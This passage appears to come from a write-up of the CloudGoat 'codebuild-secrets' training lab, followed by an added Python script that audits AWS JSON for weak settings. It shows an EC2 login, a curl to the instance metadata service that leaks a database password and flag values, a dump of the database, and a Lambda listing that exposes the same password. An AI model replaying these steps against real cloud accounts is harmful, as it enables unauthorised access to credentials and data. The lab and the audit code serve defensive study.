{ "Reservations": [ { "Groups": [], "Instances": [ { "AmiLaunchIndex": 0, "ImageId": "ami-0a313d6098716f372", "InstanceId": "i-0b226fe5e8d976a20", "InstanceType": "t2.micro", "KeyName": "cg-ec2-key-pair-cgidysjfe61q7i", "LaunchTime": "2021-01-07T04:45:30+00:00", "Monitoring": { "State": "disabled" }, "Placement": { "AvailabilityZone": "us-east-1a", "GroupName": "", "Tenancy": "default" }, "PrivateDnsName": "ip-10-10-10-218.ec2.internal", "PrivateIpAddress": "10.10.10.218", "ProductCodes": [], "PublicDnsName": "ec2-3-80-10-254.compute-1.amazonaws.com", "PublicIpAddress": "**.**.**.**", "State": { "Code": 16, "Name": "running" }, "StateTransitionReason": "", "SubnetId": "subnet-04e2754b6ac56dabe", "VpcId": "vpc-0d54cc644cc046bf5", "Architecture": "x86_64", "BlockDeviceMappings": [ { "DeviceName": "/dev/sda1", "Ebs": { "AttachTime": "2021-01-07T04:45:31+00:00", "DeleteOnTermination": true, "Status": "attached", "VolumeId": "vol-0db7760111a6a1c8e" } } ], "ClientToken": "011C34A0-6099-4720-82D5-21E17C6D06CC", "EbsOptimized": false, "EnaSupport": true, "Hypervisor": "xen", "IamInstanceProfile": { "Arn": "arn:aws:iam::7***********:instance-profile/cg-ec2-instance-profile-cgidysjfe61q7i", "Id": "AIPA23RB7ZJSAHNQLBENQ" }, "NetworkInterfaces": [ { "Association": { "IpOwnerId": "amazon", "PublicDnsName": "ec2-3-80-10-254.compute-1.amazonaws.com", "PublicIp": "**.**.**.**" }, "Attachment": { "AttachTime": "2021-01-07T04:45:30+00:00", "AttachmentId": "eni-attach-0218ccaedbc85605b", "DeleteOnTermination": true, "DeviceIndex": 0, "Status": "attached" }, "Description": "", "Groups": [ { "GroupName": "cg-ec2-ssh-cgidysjfe61q7i", "GroupId": "sg-07844914cbfefc7ce" } ], "Ipv6Addresses": [], "MacAddress": "02:bc:8d:6e:79:37", "NetworkInterfaceId": "eni-0628f8cf600a5fdba", "OwnerId": "7***********", "PrivateDnsName": "ip-10-10-10-218.ec2.internal", "PrivateIpAddress": "10.10.10.218", "PrivateIpAddresses": [ { "Association":
{ "IpOwnerId": "amazon", "PublicDnsName": "ec2-3-80-10-254.compute-1.amazonaws.com", "PublicIp": "**.**.**.**" }, "Primary": true, "PrivateDnsName": "ip-10-10-10-218.ec2.internal", "PrivateIpAddress": "10.10.10.218" } ], "SourceDestCheck": true, "Status": "in-use", "SubnetId": "subnet-04e2754b6ac56dabe", "VpcId": "vpc-0d54cc644cc046bf5", "InterfaceType": "interface" } ], "RootDeviceName": "/dev/sda1", "RootDeviceType": "ebs", "SecurityGroups": [ { "GroupName": "cg-ec2-ssh-cgidysjfe61q7i", "GroupId": "sg-07844914cbfefc7ce" } ], "SourceDestCheck": true, "Tags": [ { "Key": "Stack", "Value": "CloudGoat" }, { "Key": "Scenario", "Value": "codebuild-secrets" }, { "Key": "Name", "Value": "cg-ubuntu-ec2-cgidysjfe61q7i" } ], "VirtualizationType": "hvm", "CpuOptions": { "CoreCount": 1, "ThreadsPerCore": 1 }, "CapacityReservationSpecification": { "CapacityReservationPreference": "open" }, "HibernationOptions": { "Configured": false }, "MetadataOptions": { "State": "applied", "HttpTokens": "optional", "HttpPutResponseHopLimit": 1, "HttpEndpoint": "enabled" } } ], "OwnerId": "7***********", "ReservationId": "r-0e22e3417125b3155" } ] }
% ssh -i private ubuntu@ec2-3-80-10-254.compute-1.amazonaws.com
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-1032-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Jan 15 06:57:23 UTC 2021

  System load:  0.0               Processes:           90
  Usage of /:   25.8% of 7.69GB   Users logged in:     0
  Memory usage: 26%               IP address for eth0: 10.10.10.218
  Swap usage:   0%

 * Introducing self-healing high availability clusters in MicroK8s.
   Simple, hardened, Kubernetes for production, from RaspberryPi to DC.
     https://microk8s.io/high-availability

 Get cloud support with Ubuntu Advantage Cloud Guest:
   http://www.ubuntu.com/business/services/cloud

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

105 packages can be updated.
2 updates are security updates.

*** System restart required ***

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

ubuntu@ip-10-10-10-218:~$
Reading the launch-time user-data script from the instance metadata service yields the DB connection string, password included.
root@ip-10-10-10-218:~# curl http://169.254.169.254/latest/user-data
#!/bin/bash
apt-get update
apt-get install -y postgresql-client
psql postgresql://cgadmin:wagrrrrwwgahhhhwwwrrggawwwwwwrr@cg-rds-instance-cgidysjfe61q7i.cen1twfmlpzd.us-east-1.rds.amazonaws.com:5432/securedb \
 -c "CREATE TABLE sensitive_information (name VARCHAR(100) NOT NULL, value VARCHAR(100) NOT NULL);"
psql postgresql://cgadmin:wagrrrrwwgahhhhwwwrrggawwwwwwrr@cg-rds-instance-cgidysjfe61q7i.cen1twfmlpzd.us-east-1.rds.amazonaws.com:5432/securedb \
 -c "INSERT INTO sensitive_information (name,value) VALUES ('Key1','V\!C70RY-PvyOSDptpOVNX2JDS9K9jVetC1xI4gMO4');"
psql postgresql://cgadmin:wagrrrrwwgahhhhwwwrrggawwwwwwrr@cg-rds-instance-cgidysjfe61q7i.cen1twfmlpzd.us-east-1.rds.amazonaws.com:5432/securedb \
 -c "INSERT INTO sensitive_information (name,value) VALUES ('Key2','V\!C70RY-JpZFReKtvUiWuhyPGF20m4SDYJtOTxws6');"
With that, the DB can be connected to from the instance, and the rest is the same as the first route.
root@ip-10-10-10-218:~# psql postgresql://cgadmin:wagrrrrwwgahhhhwwwrrggawwwwwwrr@cg-rds-instance-cgidysjfe61q7i.cen1twfmlpzd.us-east-1.rds.amazonaws.com:5432/securedb
psql (10.15 (Ubuntu 10.15-0ubuntu0.18.04.1), server 9.6.19)
SSL connection (protocol: TLSv1.2, cipher: ECDHE-RSA-AES256-GCM-SHA384, bits: 256, compression: off)
Type "help" for help.

securedb=> \dt
                  List of relations
 Schema |         Name          | Type  |  Owner
--------+-----------------------+-------+---------
 public | sensitive_information | table | cgadmin
(1 row)

securedb=> select * from sensitive_information;
 name |                   value
------+--------------------------------------------
 Key1 | V\!C70RY-PvyOSDptpOVNX2JDS9K9jVetC1xI4gMO4
 Key2 | V\!C70RY-JpZFReKtvUiWuhyPGF20m4SDYJtOTxws6
(2 rows)
Alternatively, the DB connection details are also registered as environment variables of a Lambda function, which the instance profile is allowed to list, so they can be read from there instead.
root@ip-10-10-10-218:~# apt-get update
(snip)
root@ip-10-10-10-218:~# apt-get install awscli
root@ip-10-10-10-218:~# aws lambda list-functions --region us-east-1
{
    "Functions": [
        {
            "FunctionName": "cg-lambda-cgidysjfe61q7i",
            "FunctionArn": "arn:aws:lambda:us-east-1:746321857124:function:cg-lambda-cgidysjfe61q7i",
            "Runtime": "python3.6",
            "Role": "arn:aws:iam::7***********:role/cg-lambda-role-cgidysjfe61q7i-service-role",
            "Handler": "lambda.handler",
            "CodeSize": 163,
            "Description": "",
            "Timeout": 3,
            "MemorySize": 128,
            "LastModified": "2021-01-07T04:41:44.299+0000",
            "CodeSha256": "N3l99W/S7z8yvEwY1TLdVgLMk1WC3S1hjokcuc9bKGg=",
            "Version": "$LATEST",
            "Environment": {
                "Variables": {
                    "DB_USER": "cgadmin",
                    "DB_NAME": "securedb",
                    "DB_PASSWORD": "wagrrrrwwgahhhhwwwrrggawwwwwwrr"
                }
            },
            "TracingConfig": {
                "Mode": "PassThrough"
            },
            "RevisionId": "9306902f-8135-4330-81b2-a1de21321546"
        }
    ]
}
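Every step of both routes rests on a setting that the describe/list outputs above already expose: credentials as PLAINTEXT CodeBuild environment variables, a private key stored as an SSM String rather than a SecureString, an instance with HttpTokens optional (IMDSv1) so user-data and role credentials are one unauthenticated GET away, a DB password in Lambda environment variables, and a DB instance with PubliclyAccessible true. The following added example (mine, not CloudGoat's) audits the JSON those commands emit for exactly those conditions; the sample documents are constructed with placeholder ids and values.

```python
"""Audit `aws ... --output json` documents for the weak settings this scenario
relies on. Pure dict inspection, no AWS calls; added example with constructed
sample documents (ids and values are placeholders, not the page's)."""
import re

# Names or values that usually denote a credential (heuristic, not exhaustive).
SECRET_NAME = re.compile(r"(?i)(secret|passw(or)?d|token|access[-_]?key|private[-_]?key)")
AKIA_VALUE = re.compile(r"^(AKIA|ASIA)[A-Z0-9]{16}$")

def _looks_secret(name, value=""):
    return bool(SECRET_NAME.search(name) or AKIA_VALUE.match(str(value)))

def codebuild_plaintext_secrets(doc):
    """`codebuild batch-get-projects` -> [(project, var)] for PLAINTEXT
    environment variables that look like credentials. PARAMETER_STORE and
    SECRETS_MANAGER types resolve at build time and are not flagged."""
    return [(p["name"], v["name"])
            for p in doc.get("projects", [])
            for v in p.get("environment", {}).get("environmentVariables", [])
            if v.get("type", "PLAINTEXT") == "PLAINTEXT"
            and _looks_secret(v["name"], v.get("value", ""))]

def lambda_env_secrets(doc):
    """`lambda list-functions` -> [(function, var)]; anyone allowed to list or
    get the function reads these values in clear, as the route above did."""
    return [(f["FunctionName"], k)
            for f in doc.get("Functions", [])
            for k, v in f.get("Environment", {}).get("Variables", {}).items()
            if _looks_secret(k, v)]

def ssm_string_secrets(doc):
    """`ssm describe-parameters` -> names stored as plain String although the
    name says they hold a key or password (SecureString is the expected type)."""
    return [p["Name"] for p in doc.get("Parameters", [])
            if p.get("Type") == "String" and _looks_secret(p["Name"])]

def imdsv1_instances(doc):
    """`ec2 describe-instances` -> instance ids still answering IMDSv1
    (HttpTokens != required): user-data and role credentials are reachable
    with a plain GET from any process on the box."""
    return [i["InstanceId"]
            for r in doc.get("Reservations", [])
            for i in r.get("Instances", [])
            if i.get("MetadataOptions", {}).get("HttpTokens") != "required"]

def public_rds_instances(doc):
    """`rds describe-db-instances` -> identifiers with PubliclyAccessible
    true, the state newinstance1 was put into above."""
    return [d["DBInstanceIdentifier"] for d in doc.get("DBInstances", [])
            if d.get("PubliclyAccessible")]

# Constructed samples shaped like the outputs above; placeholders throughout.
SAMPLE_CODEBUILD = {"projects": [{"name": "cg-codebuild-EXAMPLE", "environment": {
    "environmentVariables": [
        {"name": "calrissian-aws-access-key", "value": "AKIAEXAMPLEEXAMPLE00", "type": "PLAINTEXT"},
        {"name": "calrissian-aws-secret-key", "value": "notreal", "type": "PLAINTEXT"},
        {"name": "BUILD_NUMBER", "value": "42", "type": "PLAINTEXT"},
        {"name": "DB_PASSWORD", "value": "/prod/db/pw", "type": "PARAMETER_STORE"}]}}]}
SAMPLE_LAMBDA = {"Functions": [{"FunctionName": "cg-lambda-EXAMPLE", "Environment": {
    "Variables": {"DB_USER": "cgadmin", "DB_NAME": "securedb", "DB_PASSWORD": "notreal"}}}]}
SAMPLE_SSM = {"Parameters": [{"Name": "cg-ec2-private-key-EXAMPLE", "Type": "String"},
                             {"Name": "cg-ec2-public-key-EXAMPLE", "Type": "String"},
                             {"Name": "db-password", "Type": "SecureString"}]}
SAMPLE_EC2 = {"Reservations": [{"Instances": [
    {"InstanceId": "i-EXAMPLE1", "MetadataOptions": {"HttpTokens": "optional"}},
    {"InstanceId": "i-EXAMPLE2", "MetadataOptions": {"HttpTokens": "required"}}]}]}
SAMPLE_RDS = {"DBInstances": [
    {"DBInstanceIdentifier": "cg-rds-instance-EXAMPLE", "PubliclyAccessible": False},
    {"DBInstanceIdentifier": "newinstance1", "PubliclyAccessible": True}]}

def audit_samples():
    """Run every check against the samples and return the findings."""
    return {
        "codebuild_plaintext_secrets": codebuild_plaintext_secrets(SAMPLE_CODEBUILD),
        "lambda_env_secrets": lambda_env_secrets(SAMPLE_LAMBDA),
        "ssm_string_secrets": ssm_string_secrets(SAMPLE_SSM),
        "imdsv1_instances": imdsv1_instances(SAMPLE_EC2),
        "public_rds_instances": public_rds_instances(SAMPLE_RDS),
    }

if __name__ == "__main__":
    for check, hits in audit_samples().items():
        print(f"{check}: {hits}")
```

To run it against a real account, pipe the output of the corresponding `aws ... --output json` command through `json.load` into the matching function.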
ecs_efs_attack
It does not seem to be working at the moment, so I will do it once it works.